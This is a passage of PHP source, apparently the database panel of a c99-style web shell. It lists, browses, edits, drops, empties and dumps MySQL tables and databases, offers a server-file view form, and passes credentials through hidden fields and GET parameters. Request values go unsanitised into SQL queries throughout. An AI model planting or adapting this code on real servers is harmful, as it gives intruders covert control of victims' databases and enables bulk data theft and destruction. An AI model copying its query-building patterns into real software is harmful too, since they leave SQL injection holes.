2107 while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
2108
2109 if (!$c) {echo "No tables found in database.";}
2110
2111 }
2112
2113 }
2114
2115 else
2116
2117 {
2118
2119 ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
2120
2121 $result = mysql_list_dbs($sql_sock);
2122
2123 if (!$result) {echo mysql_smarterror();}
2124
2125 else
2126
2127 {
2128
2129 ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
2130
2131 $c = 0;
2132
2133 $dbs = "";
2134
2135 while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
2136
2137 echo "<option value=\"\">Databases (".$c.")</option>";
2138
2139 echo $dbs;
2140
2141 }
2142
2143 ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
2144
2145 }
2146
2147 //End left panel
2148
2149 echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
2150
2151 //Start center panel
2152
2153 $diplay = TRUE;
2154
2155 if ($sql_db)
2156
2157 {
2158
2159 if (!is_numeric($c)) {$c = 0;}
2160
2161 if ($c == 0) {$c = "no";}
2162
2163 echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
2164
2165 if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
2166
2167 echo "</b></center>";
2168
2169 $acts = array("","dump");
2170
2171 if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
2172
2173 elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
2174
2175 elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
2176
2177 elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
2178
2179 elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
2180
2181 elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
2182
2183 elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
2184
2185 elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
2186
2187 elseif ($sql_tbl_act == "insert")
2188
2189 {
2190
2191 if ($sql_tbl_insert_radio == 1)
2192
2193 {
2194
2195 $keys = "";
2196
2197 $akeys = array_keys($sql_tbl_insert);
2198
2199 foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
2200
2201 if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
2202
2203 $values = "";
2204
2205 $i = 0;
2206
2207 foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
2208
2209 if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
2210
2211 $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
2212
2213 $sql_act = "query";
2214
2215 $sql_tbl_act = "browse";
2216
2217 }
2218
2219 elseif ($sql_tbl_insert_radio == 2)
2220
2221 {
2222
2223 $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
2224
2225 $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
2226
2227 $result = mysql_query($sql_query) or print(mysql_smarterror());
2228
2229 $result = mysql_fetch_array($result, MYSQL_ASSOC);
2230
2231 $sql_act = "query";
2232
2233 $sql_tbl_act = "browse";
2234
2235 }
2236
2237 }
2238
2239 if ($sql_act == "query")
2240
2241 {
2242
2243 echo "<hr size=\"1\" noshade>";
2244
2245 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
2246
2247 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
2248
2249 if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
2250
2251 }
2252
2253 if (in_array($sql_act,$acts))
2254
2255 {
2256
2257 ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
2258
2259 if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
2260
2261 if ($sql_act == "newtbl")
2262
2263 {
2264
2265 echo "<b>";
2266
2267 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
2268
2269 }
2270
2271 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
2272
2273 }
2274
2275 elseif ($sql_act == "dump")
2276
2277 {
2278
2279 if (empty($submit))
2280
2281 {
2282
2283 $diplay = FALSE;
2284
2285 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
2286
2287 echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
2288
2289 $v = join (";",$dmptbls);
2290
2291 echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
2292
2293 if ($dump_file) {$tmp = $dump_file;}
2294
2295 else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
2296
2297 echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
2298
2299 echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
2300
2301 echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
2302
2303 echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
2304
2305 echo "</form>";
2306
2307 }
2308
2309 else
2310
2311 {
2312
2313 $diplay = TRUE;
2314
2315 $set = array();
2316
2317 $set["sock"] = $sql_sock;
2318
2319 $set["db"] = $sql_db;
2320
2321 $dump_out = "download";
2322
2323 $set["print"] = 0;
2324
2325 $set["nl2br"] = 0;
2326
2327 $set[""] = 0;
2328
2329 $set["file"] = $dump_file;
2330
2331 $set["add_drop"] = TRUE;
2332
2333 $set["onlytabs"] = array();
2334
2335 if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
2336
2337 $ret = mysql_dump($set);
2338
2339 if ($sql_dump_download)
2340
2341 {
2342
2343 @ob_clean();
2344
2345 header("Content-type: application/octet-stream");
2346
2347 header("Content-length: ".strlen($ret));
2348
2349 header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
2350
2351 echo $ret;
2352
2353 exit;
2354
2355 }
2356
2357 elseif ($sql_dump_savetofile)
2358
2359 {
2360
2361 $fp = fopen($sql_dump_file,"w");
2362
2363 if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
2364
2365 else
2366
2367 {
2368
2369 fwrite($fp,$ret);
2370
2371 fclose($fp);
2372
2373 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
2374
2375 }
2376
2377 }
2378
2379 else {echo "<b>Dump: nothing to do!</b>";}
2380
2381 }
2382
2383 }
2384
2385 if ($diplay)
2386
2387 {
2388
2389 if (!empty($sql_tbl))
2390
2391 {
2392
2393 if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
2394
2395 $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
2396
2397 $count_row = mysql_fetch_array($count);
2398
2399 mysql_free_result($count);
2400
2401 $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
2402
2403 $tbl_struct_fields = array();
2404
2405 while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
2406
2407 if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
2408
2409 if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
2410
2411 if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
2412
2413 if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
2414
2415 $perpage = $sql_tbl_le - $sql_tbl_ls;
2416
2417 if (!is_numeric($perpage)) {$perpage = 10;}
2418
2419 $numpages = $count_row[0]/$perpage;
2420
2421 $e = explode(" ",$sql_order);
2422
2423 if (count($e) == 2)
2424
2425 {
2426
2427 if ($e[0] == "d") {$asc_desc = "DESC";}
2428
2429 else {$asc_desc = "ASC";}
2430
2431 $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
2432
2433 }
2434
2435 else {$v = "";}
2436
2437 $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
2438
2439 $result = mysql_query($query) or print(mysql_smarterror());
2440
2441 echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
2442
2443 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
2444
2445 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
2446
2447 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
2448
2449 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
2450
2451 if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
2452
2453 if ($sql_tbl_act == "insert")
2454
2455 {
2456
2457 if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
2458
2459 if (!empty($sql_tbl_insert_radio))
2460
2461 {
2462
2463
2464
2465 }
2466
2467 else
2468
2469 {
2470
2471 echo "<br><br><b>Inserting row into table:</b><br>";
2472
2473 if (!empty($sql_tbl_insert_q))
2474
2475 {
2476
2477 $sql_query = "SELECT * FROM `".$sql_tbl."`";
2478
2479 $sql_query .= " WHERE".$sql_tbl_insert_q;
2480
2481 $sql_query .= " LIMIT 1;";
2482
2483 $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
2484
2485 $values = mysql_fetch_assoc($result);
2486
2487 mysql_free_result($result);
2488
2489 }
2490
2491 else {$values = array();}
2492
2493 echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
2494
2495 foreach ($tbl_struct_fields as $field)
2496
2497 {
2498
2499 $name = $field["Field"];
2500
2501 if (empty($sql_tbl_insert_q)) {$v = "";}
2502
2503 echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
2504
2505 $i++;
2506
2507 }
2508
2509 echo "</table><br>";
2510
2511 echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
2512
2513 if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
2514
2515 echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
2516
2517 }
2518
2519 }
2520
2521 if ($sql_tbl_act == "browse")
2522
2523 {
2524
2525 $sql_tbl_ls = abs($sql_tbl_ls);
2526
2527 $sql_tbl_le = abs($sql_tbl_le);
2528
2529 echo "<hr size=\"1\" noshade>";
2530
2531 echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
2532
2533 $b = 0;
2534
2535 for($i=0;$i<$numpages;$i++)
2536
2537 {
2538
2539 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
2540
2541 echo $i;
2542
2543 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
2544
2545 if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
2546
2547 else {echo "&nbsp;";}
2548
2549 }
2550
2551 if ($i == 0) {echo "empty";}
2552
2553 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
2554
2555 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1>";
2556
2557 echo "<tr>";
2558
2559 echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
2560
2561 for ($i=0;$i<mysql_num_fields($result);$i++)
2562
2563 {
2564
2565 $v = mysql_field_name($result,$i);
2566
2567 if ($e[0] == "a") {$s = "d"; $m = "asc";}
2568
2569 else {$s = "a"; $m = "desc";}
2570
2571 echo "<td>";
2572
2573 if (empty($e[0])) {$e[0] = "a";}
2574
2575 if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
2576
2577 else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
2578
2579 echo "</td>";
2580
2581 }
2582
2583 echo "<td><font color=\"green\"><b>Action</b></font></td>";
2584
2585 echo "</tr>";
2586
2587 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
2588
2589 {
2590
2591 echo "<tr>";
2592
2593 $w = "";
2594
2595 $i = 0;
2596
2597 foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
2598
2599 if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
2600
2601 echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
2602
2603 $i = 0;
2604
2605 foreach ($row as $k=>$v)
2606
2607 {
2608
2609 $v = htmlspecialchars($v);
2610
2611 if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
2612
2613 echo "<td>".$v."</td>";
2614
2615 $i++;
2616
2617 }
2618
2619 echo "<td>";
2620
2621 echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
2622
2623 echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
2624
2625 echo "</td>";
2626
2627 echo "</tr>";
2628
2629 }
2630
2631 mysql_free_result($result);
2632
2633 echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
2634
2635 echo "<option value=\"\">With selected:</option>";
2636
2637 echo "<option value=\"deleterow\">Delete</option>";
2638
2639 echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
2640
2641 }
2642
2643 }
2644
2645 else
2646
2647 {
2648
2649 $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
2650
2651 if (!$result) {echo mysql_smarterror();}
2652
2653 else
2654
2655 {
2656
2657 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
2658
2659
2660
2661 $i = 0;
2662
2663 $tsize = $trows = 0;
2664
2665 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
2666
2667 {
2668
2669 $tsize += $row["Data_length"];
2670
2671 $trows += $row["Rows"];
2672
2673 $size = view_size($row["Data_length"]);
2674
2675 echo "<tr>";
2676
2677 echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
2678
2679 echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
2680
2681 echo "<td>".$row["Rows"]."</td>";
2682
2683 echo "<td>".$row["Type"]."</td>";
2684
2685 echo "<td>".$row["Create_time"]."</td>";
2686
2687 echo "<td>".$row["Update_time"]."</td>";
2688
2689 echo "<td>".$size."</td>";
2690
2691 echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
2692
2693 echo "</tr>";
2694
2695 $i++;
2696
2697 }
2698
2699 echo "<tr bgcolor=\"000000\">";
2700
2701 echo "<td><center><b>»</b></center></td>";
2702
2703 echo "<td><center><b>".$i." table(s)</b></center></td>";
2704
2705 echo "<td><b>".$trows."</b></td>";
2706
2707 echo "<td>".$row[1]."</td>";
2708
2709 echo "<td>".$row[10]."</td>";
2710
2711 echo "<td>".$row[11]."</td>";
2712
2713 echo "<td><b>".view_size($tsize)."</b></td>";
2714
2715 echo "<td></td>";
2716
2717 echo "</tr>";
2718
2719 echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
2720
2721 echo "<option value=\"\">With selected:</option>";
2722
2723 echo "<option value=\"tbldrop\">Drop</option>";
2724
2725 echo "<option value=\"tblempty\">Empty</option>";
2726
2727 echo "<option value=\"tbldump\">Dump</option>";
2728
2729 echo "<option value=\"tblcheck\">Check table</option>";
2730
2731 echo "<option value=\"tbloptimize\">Optimize table</option>";
2732
2733 echo "<option value=\"tblrepair\">Repair table</option>";
2734
2735 echo "<option value=\"tblanalyze\">Analyze table</option>";
2736
2737 echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
2738
2739 mysql_free_result($result);
2740
2741 }
2742
2743 }
2744
2745 }
2746
2747 }
2748
2749 }
2750
2751 else
2752
2753 {
2754
2755 $acts = array("","newdb","serverstatus","servervars","processes","getfile");
2756
2757 if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
2758
2759 if (!empty($sql_act))
2760
2761 {
2762
2763 echo "<hr size=\"1\" noshade>";
2764
2765 if ($sql_act == "newdb")
2766
2767 {
2768
2769 echo "<b>";
2770
2771 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
2772
2773 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
2774
2775 }
2776
2777 if ($sql_act == "serverstatus")
2778
2779 {
2780
2781 $result = mysql_query("SHOW STATUS", $sql_sock);
2782
2783 echo "<center><b>Server-status variables:</b><br><br>";
2784
2785 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
2786
2787 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
2788
2789 echo "</table></center>";
2790
2791 mysql_free_result($result);
2792
2793 }
2794
2795 if ($sql_act == "servervars")
2796
2797 {
2798
2799 $result = mysql_query("SHOW VARIABLES", $sql_sock);
2800
2801 echo "<center><b>Server variables:</b><br><br>";
2802
